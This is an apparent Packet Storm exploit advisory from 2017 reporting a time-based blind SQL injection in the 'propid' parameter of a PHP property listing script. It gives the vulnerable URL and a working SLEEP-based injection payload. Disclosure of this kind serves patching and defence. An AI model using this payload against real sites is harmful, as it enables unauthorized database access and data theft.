Property Listing Script Blind SQL Injection

2017-02-02T00:00:00
ID PACKETSTORM:140903
Type packetstorm
Reporter Kaan KAMIS
Modified 2017-02-02T00:00:00

Description

                                        
                                            `Exploit Title: Property Listing Script a Time-Based Blind Injection  
Date: 02.02.2017  
Vendor Homepage: http://phprealestatescript.org/  
Software Link: http://phprealestatescript.org/property-listing-script.html  
Exploit Author: Kaan KAMIS  
Contact: iletisim[at]k2an[dot]com  
Website: http://k2an.com  
Category: Web Application Exploits  
  
Overview  
  
Advanced PHP Real-Estate Script, we have almost covered the Main features required for a Property Buy and Sell Listing Script.  
  
Vulnerable Url: http://locahost/property-list/property_view.php?propid=443[payload]  
Parameter: propid (GET)  
Type: AND/OR time-based blind  
  
Simple Payload:  
Payload: propid=443' AND SLEEP(5) AND 'FBop'='FBop  
  
`